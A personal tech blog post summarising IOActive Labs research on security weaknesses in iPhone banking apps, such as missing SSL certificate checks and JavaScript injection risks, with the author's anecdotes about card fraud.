Mobile Banking Apps: Are We Really Safe?

Mobile Banking Apps: Are We Really Safe?

I am in love with smartphone applications or just simply “apps” as most–if not all–of us refer it to. With the development these apps had for the past couple of years, it’s safe to say that they simply make our everyday lives easier. There’s even this one radio ad that i heard before claiming that these days, “there’s always an app for everything”.

Well, thinking about it, i think it is true.  A lot of companies from all parts of the world of all sorts these days have created mobile apps crafted for iOS, Android, Windows Phone and BlackBerry users designed for them to reach their customers easier in different ways. One example are Banks. Banks from all over the world created smartphone apps to let their customers check their balance or perform whatever banking transaction they need to just like paying bills, as long as these actions are available with the web version of their Bank’s eBanking services.

Yes, it is very convenient. But, the question is: Are we really that willing to entrust the safety of our hard earned money into these mobile applications our banks are offering when we hardly know how safe it was developed just for the convenience of not having to go to the ATM machine each time we need to check our balance, or saving ourselves a trip to the bank for bills payment and what nots when we live in a world where hackers and identity thieves are so out there, ready to make a move to steal not just money, but also personal information they can use?

A research conducted by Ariel Sanchez of IOActive Labs proved that many of the mobile banking apps available for download from your smartphone’s app store are plagued with vulnerabilities making customers and banks very susceptible to hacking and information stealing. This research was conducted in a total of 40 non-consecutive hours using Apple iPhone and iPad devices to test 40 mobile banking apps from 60 of the World’s top banks.

IOActive Labs Research

Although the research did not discuss publicly specific vulnerabilities of the apps tested, the research revealed that:

IOActive Labs result summary

1. Less than 20% of the apps tested poses risk from memory corruption attacks, since their Position Independent Executable (PIE) and Stack Smashing protection are disabled.

2. 40% of the apps tested were found that they don’t validate the authenticity of SSL certificates presented, making them susceptible to Man-in-The-Middle (MiTM) attacks.

3. Over 50% of the apps have Insecure UIWebView implementations, making them vulnerable to Javascript injection attacks. When the iOS functionality gets exposed, attackers can easily send SMS or even e-mails from the victim’s device, without the latter knowing.

4. Almost 70% of the apps does not feature an alternative authentication solutions, which can lead to impersonation attacks.

5. 90% of the apps contains non-SSL links, letting attackers create fake log-in prompts by intercepting traffic and injecting an arbitrary Javascript/HTML codes.

6. A new way of phishing attacks have surfaced. By injecting a code that would prompt a user to reenter the user’s credentials because “the online banking session has expired”, the attacker can easily steal a user’s log in details.

These results are disturbing. With the recent data theft incident that happened last November 2013 during the ThanksGiving and Black Friday sale in the US where more than 40 million Target credit cards might have been included, it shows that everyone is posed to a threat of identity theft and possibly, information stealing until banks and developers makes sure that their apps are secured and safe from attacks.

Personally, I use local bank apps from BPI, Unionbank and other mobile banking apps like GCash, and so far, my accounts have not been comprised yet, and i’m hoping it stays that way. A relative I know based in New York (and a Cebuana as well) on the other hand went to LA last summer for a quick vacation. She tried to log-in onto her online account using her mobile phone for the first time to check her balance, and the next thing she knew, there were charges a day after on her card from establishments in Europe. It’s a good thing that the bank reversed the charges since there’s no way for her to be in LA and make charges from Europe.

With this said, I can’t help but ask again. With mobile banking apps, are we really safe?

Bert Padilla

Founding-Editor of Cebu Tech Blogger where he shares insights in eCommerce, Digital Marketing, Ad Ops, Tech, Startups, Technopreneurship, Life Goals and Hacks. He's the brainchild and ninja of a Cebu-based digital agency, TekWorx.Digital, with ventures TekWorx, (eCommerce and Digital Marketing), AdWorx (Outsourced Ad Ops for Publishers) and BlogWorx (full-fledged Blog Development service). Read his Full Curriculum Vitae. For training and consultancy, services, speaking engagements, blog partnerships or media invites, click here. Alternatively, get in touch with him on Messenger.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Close Menu